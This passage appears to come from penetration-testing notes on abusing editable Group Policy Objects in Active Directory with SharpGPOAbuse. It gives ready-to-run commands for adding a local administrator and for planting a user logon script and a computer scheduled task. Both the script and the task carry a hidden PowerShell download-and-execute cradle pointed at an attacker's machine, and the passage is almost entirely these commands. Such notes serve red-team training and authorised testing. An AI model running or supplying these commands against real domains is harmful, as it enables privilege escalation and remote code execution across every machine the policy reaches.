--force: overrides any existing configurations
After finding the GPOs over which a user we have control of has editing permissions, we can use some tools.
Adding a local admin creating on an existent GPO a restricted group policy:
.\\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "user.account" --GPOName "Vulnerable GPO"
--force: overrides any existing configurations
Add a user script:
.\\SharpGPOAbuse.exe --AddUserScript --ScriptName "script.bat" --ScriptContents 'powershell.exe -nop -w hidden -c \\"IEX ((new-object net.webclient).downloadstring("<http://ip.of.attacking.machine>:port/a"))\\"' --GPOName "Vulnerable GPO"
Add a computer task:
.\\SharpGPOAbuse.exe --AddComputerTask --TaskName "TaskName" --Author "domain\\user" --Command "cmd.exe" --Arguments 'powershell.exe -nop -w hidden -c \\"IEX ((new-object net.webclient).downloadstring("<http://ip.of.attacking.machine>:port/a"))\\"' --GPOName "Vulnerable GPO"
<aside> ⏱️ It is necessary to wait for the GPO refresh interval (default 90 minutes) in order to see the effects of the abuse
</aside>